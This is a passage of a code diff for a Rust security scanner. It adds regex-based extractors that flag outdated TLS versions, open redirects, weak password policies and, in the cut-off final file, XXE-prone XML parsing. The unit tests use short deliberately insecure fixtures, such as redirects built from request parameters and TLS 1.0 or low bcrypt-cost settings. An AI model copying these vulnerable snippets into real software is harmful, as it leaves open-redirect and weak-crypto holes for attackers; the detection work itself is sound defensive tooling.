assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.value == ObjectValue::Text("deprecated".to_string())));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_tls12() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{
|
||||
MinVersion: tls.VersionTLS12,
|
||||
}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_tls13() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
use rustls::version::TLS13;
|
||||
config.min_protocol_version = Some(TLS13);
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_modern_config() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
tls:
|
||||
min_version: "1.2"
|
||||
max_version: "1.3"
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_concept_path_structure() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{MinVersion: tls.VersionTLS10}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("tls/min_version"));
|
||||
}
|
||||
|
||||
// ===== Phase 8.4: Semantic TLS Version Detection Tests =====
|
||||
|
||||
#[test]
|
||||
fn test_semantic_const_rust() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"const TLS_MIN_VERSION: &str = "1.0";"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_semantic_let_js() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"let sslVersion = "TLSv1";"#;
|
||||
|
||||
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "config.js");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_semantic_assignment_python() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"TLS_MINIMUM_VERSION = "1.1""#;
|
||||
|
||||
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "config.py");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.description.contains("Semantic")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_semantic_ssl_version() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"const SSL_VERSION = "SSLv3";"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/ssl.rs");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_env_tls_version() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = "TLS_MIN_VERSION=1.0";
|
||||
|
||||
let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.description.contains("Environment variable")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_env_export_ssl() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = "export SSL_VERSION=TLSv1";
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env.production");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_terraform_min_tls_version() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"min_tls_version = "TLS1_0""#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.description.contains("Terraform")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_terraform_ssl_version() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"ssl_minimum_protocol_version = "TLSv1""#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "variables.tf");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_k8s_min_tls_version() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
apiVersion: v1
|
||||
kind: Config
|
||||
spec:
|
||||
minTLSVersion: VersionTLS10
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
assert!(claims.iter().any(|c| c.description.contains("Kubernetes")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_k8s_tls_min_version_camel() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"tlsMinVersion: "1.0""#;
|
||||
|
||||
let claims = extractor.extract(&["k8s".to_string()], content, Language::Yaml, "ingress.yaml");
|
||||
|
||||
assert!(!claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positive_semantic_tls12() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"const TLS_MIN_VERSION = "1.2";"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/config.rs");
|
||||
|
||||
// TLS 1.2 is safe, should not match semantic pattern
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positive_env_tls13() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = "TLS_VERSION=1.3";
|
||||
|
||||
let claims = extractor.extract(&["env".to_string()], content, Language::Dotenv, ".env");
|
||||
|
||||
// TLS 1.3 is safe, should not match
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positive_terraform_tls12() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"min_tls_version = "TLS1_2""#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["terraform".to_string()], content, Language::Terraform, "main.tf");
|
||||
|
||||
// TLS 1.2 is safe
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positive_k8s_tls12() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"minTLSVersion: VersionTLS12"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["k8s".to_string()], content, Language::Yaml, "deployment.yaml");
|
||||
|
||||
// TLS 1.2 is safe
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
301
applications/aphoria/src/extractors/unvalidated_redirects.rs
Normal file
301
applications/aphoria/src/extractors/unvalidated_redirects.rs
Normal file
@ -0,0 +1,301 @@
|
||||
//! Unvalidated redirects vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where HTTP redirects use user-controlled input
|
||||
//! without proper validation, which can lead to open redirect attacks.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for unvalidated redirect vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe redirect handling:
|
||||
/// - redirect() with user-controlled URLs
|
||||
/// - window.location assignment with user input
|
||||
/// - URL parameters named redirect/return/next/goto
|
||||
pub struct UnvalidatedRedirectsExtractor {
|
||||
// Python patterns
|
||||
python_redirect: Regex,
|
||||
python_flask_redirect: Regex,
|
||||
|
||||
// JavaScript/TypeScript patterns
|
||||
js_redirect: Regex,
|
||||
js_location: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_redirect: Regex,
|
||||
|
||||
// Universal URL parameter patterns
|
||||
url_param: Regex,
|
||||
}
|
||||
|
||||
impl Default for UnvalidatedRedirectsExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl UnvalidatedRedirectsExtractor {
|
||||
/// Create a new unvalidated redirects extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: redirect with user input
|
||||
python_redirect: Regex::new(
|
||||
r#"(?:redirect|HttpResponseRedirect)\s*\(\s*(?:request\.(?:GET|POST|args)|url|next|return_url)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_flask_redirect: Regex::new(
|
||||
r#"redirect\s*\(\s*request\.(?:args|form)\.get\s*\("#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: redirect with user input
|
||||
js_redirect: Regex::new(
|
||||
r#"res\.redirect\s*\(\s*(?:req\.(?:query|params|body)\.|url|next)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_location: Regex::new(
|
||||
r#"(?:window\.)?location(?:\.href)?\s*=\s*(?:url|params|query|req\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Go: http.Redirect with user input
|
||||
go_redirect: Regex::new(
|
||||
r#"http\.Redirect\s*\([^,]*,\s*[^,]*,\s*(?:r\.|req\.|c\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Universal: dangerous URL parameter patterns
|
||||
url_param: Regex::new(
|
||||
r#"(?i)(?:redirect|return|next|goto|url|continue)(?:_url|Uri|_to)?\s*[:=]\s*(?:req\.|request\.|params\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["http", "redirect", category],
|
||||
"redirect_source",
|
||||
ObjectValue::Text("user_controlled".to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.85,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for UnvalidatedRedirectsExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"unvalidated_redirects"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for dangerous URL parameter patterns (all languages)
|
||||
if let Some(m) = self.url_param.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"url_parameter",
|
||||
"Redirect URL from user-controlled parameter (open redirect risk)",
|
||||
));
|
||||
}
|
||||
|
||||
// Language-specific patterns
|
||||
match language {
|
||||
Language::Python => {
|
||||
if let Some(m) = self.python_redirect.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"response",
|
||||
"Redirect with user-controlled URL (open redirect risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_flask_redirect.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"response",
|
||||
"Flask redirect with request parameter (open redirect risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
if let Some(m) = self.js_redirect.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"response",
|
||||
"res.redirect with user input (open redirect risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_location.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"client_side",
|
||||
"window.location assignment with user input (open redirect risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
if let Some(m) = self.go_redirect.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"response",
|
||||
"http.Redirect with user input (open redirect risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_redirect() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
let content = r#"
|
||||
return redirect(request.GET['next'])
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "views.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("http/redirect"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_flask_redirect() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
let content = r#"
|
||||
return redirect(request.form.get('destination'))
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
|
||||
|
||||
// Should match the flask redirect pattern (redirect + request.form.get)
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_redirect() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
let content = r#"
|
||||
res.redirect(req.query.next);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_location() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
let content = r#"
|
||||
window.location = url;
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("window.location"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_redirect() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
let content = r#"
|
||||
http.Redirect(w, r, r.URL.Query().Get("next"), http.StatusFound)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "handler.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_url_param_pattern() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
let content = r#"
|
||||
redirect_url = request.args.get("redirect")
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "handler.py");
|
||||
|
||||
// Should match the url_param pattern (redirect_url = request.)
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_static_redirect() {
|
||||
let extractor = UnvalidatedRedirectsExtractor::new();
|
||||
// Safe: static redirect URL
|
||||
let content = r#"
|
||||
res.redirect('/login');
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
344
applications/aphoria/src/extractors/weak_password.rs
Normal file
344
applications/aphoria/src/extractors/weak_password.rs
Normal file
@ -0,0 +1,344 @@
|
||||
//! Weak password requirements extractor.
|
||||
//!
|
||||
//! Detects patterns where password policies are too weak,
|
||||
//! such as minimum length < 8, bcrypt cost < 10, or missing complexity requirements.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for weak password requirement configurations.
|
||||
///
|
||||
/// Detects patterns indicating insufficient password policies:
|
||||
/// - Minimum password length < 8 characters
|
||||
/// - Bcrypt cost/rounds < 10
|
||||
/// - Complexity requirements disabled
|
||||
pub struct WeakPasswordExtractor {
|
||||
// Minimum length too short (< 8)
|
||||
min_length_weak: Regex,
|
||||
min_length_config: Regex,
|
||||
|
||||
// Bcrypt cost too low (< 10)
|
||||
bcrypt_weak: Regex,
|
||||
|
||||
// Simple length check in code
|
||||
simple_check: Regex,
|
||||
|
||||
// Special chars not required
|
||||
no_special: Regex,
|
||||
no_uppercase: Regex,
|
||||
no_number: Regex,
|
||||
}
|
||||
|
||||
impl Default for WeakPasswordExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl WeakPasswordExtractor {
|
||||
/// Create a new weak password extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Minimum length too short (< 8) in various config formats
|
||||
min_length_weak: Regex::new(
|
||||
r#"(?i)(?:min[_-]?(?:password[_-]?)?length|password[_-]?min(?:[_-]?length)?)\s*[:=]\s*[1-7](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
min_length_config: Regex::new(
|
||||
r#"(?i)["']?(?:minLength|min_length|minimumLength)["']?\s*[:=]\s*[1-7](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Bcrypt cost too low (< 10)
|
||||
bcrypt_weak: Regex::new(
|
||||
r#"(?i)(?:bcrypt|hash|argon2?|scrypt).*(?:cost|rounds|iterations)\s*[:=]\s*[1-9](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Simple length check in code (checking for < 8)
|
||||
simple_check: Regex::new(
|
||||
r#"len\s*\(\s*password\s*\)\s*(?:>=?|>)\s*[1-7](?:\D|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Complexity requirements disabled
|
||||
no_special: Regex::new(
|
||||
r#"(?i)require[_-]?(?:special|symbol)[_-]?(?:char)?s?\s*[:=]\s*(?:false|no|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
no_uppercase: Regex::new(
|
||||
r#"(?i)require[_-]?(?:upper|uppercase)[_-]?(?:case)?\s*[:=]\s*(?:false|no|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
no_number: Regex::new(
|
||||
r#"(?i)require[_-]?(?:number|digit)s?\s*[:=]\s*(?:false|no|0)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
value: ObjectValue,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["auth", "password", "policy", category],
|
||||
"requirement_strength",
|
||||
value,
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.9,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for WeakPasswordExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"weak_password"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Rust,
|
||||
Language::Yaml,
|
||||
Language::Json,
|
||||
Language::Toml,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
_language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for weak minimum length
|
||||
if let Some(m) = self.min_length_weak.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"min_length",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Minimum password length < 8 characters (should be at least 8)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.min_length_config.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"min_length",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Minimum password length < 8 characters (should be at least 8)",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for weak bcrypt cost
|
||||
if let Some(m) = self.bcrypt_weak.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"hash_cost",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Password hashing cost/rounds < 10 (should be at least 10 for bcrypt)",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for simple length validation
|
||||
if let Some(m) = self.simple_check.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"validation",
|
||||
ObjectValue::Text("weak".to_string()),
|
||||
"Password validation allows < 8 characters",
|
||||
));
|
||||
}
|
||||
|
||||
// Check for disabled complexity requirements
|
||||
if let Some(m) = self.no_special.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"complexity",
|
||||
ObjectValue::Boolean(false),
|
||||
"Special character requirement disabled",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.no_uppercase.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"complexity",
|
||||
ObjectValue::Boolean(false),
|
||||
"Uppercase requirement disabled",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.no_number.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"complexity",
|
||||
ObjectValue::Boolean(false),
|
||||
"Number/digit requirement disabled",
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_weak_min_length_yaml() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
password_min: 6
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
// Should match min_length_weak pattern
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("auth/password/policy"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_weak_min_length_json() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
"minLength": 4
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Json, "config.json");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_weak_bcrypt_cost() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
bcrypt_cost = 8
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("cost/rounds"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_simple_length_check() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
if len(password) >= 6:
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "auth.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_special_chars() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
require_special_chars: false
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("Special character"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_uppercase() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
let content = r#"
|
||||
require_uppercase = false
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_strong() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
// Strong: min length >= 8
|
||||
let content = r#"
|
||||
password_min_length: 12
|
||||
bcrypt_cost: 12
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_boundary_value_8() {
|
||||
let extractor = WeakPasswordExtractor::new();
|
||||
// Boundary: exactly 8 should be OK
|
||||
let content = r#"
|
||||
password_min_length: 8
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "auth.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
432
applications/aphoria/src/extractors/xxe.rs
Normal file
432
applications/aphoria/src/extractors/xxe.rs
Normal file
@ -0,0 +1,432 @@
|
||||
//! XML External Entity (XXE) vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where XML parsers are used without disabling external entity
|
||||
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for XXE vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating potentially unsafe XML parsing:
|
||||
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
|
||||
/// - JavaScript: xml2js, libxmljs
|
||||
/// - Go: encoding/xml
|
||||
/// - Java-style patterns (polyglot detection)
|
||||
/// - DTD entity declarations
|
||||
pub struct XxeExtractor {
|
||||
// Python patterns
|
||||
python_lxml: Regex,
|
||||
python_etree: Regex,
|
||||
python_minidom: Regex,
|
||||
python_sax: Regex,
|
||||
|
||||
// JavaScript patterns
|
||||
js_xml2js: Regex,
|
||||
js_libxmljs: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_xml: Regex,
|
||||
|
||||
// Java-style patterns
|
||||
java_xxe: Regex,
|
||||
|
||||
// DTD entity declaration
|
||||
entity_decl: Regex,
|
||||
}
|
||||
|
||||
impl Default for XxeExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl XxeExtractor {
|
||||
/// Create a new XXE extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: lxml/etree parse
|
||||
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: xml.etree.ElementTree
|
||||
python_etree: Regex::new(
|
||||
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: xml.dom.minidom
|
||||
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Python: xml.sax
|
||||
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: xml2js
|
||||
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
|
||||
|
||||
// JavaScript: libxmljs
|
||||
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
|
||||
|
||||
// Go: encoding/xml
|
||||
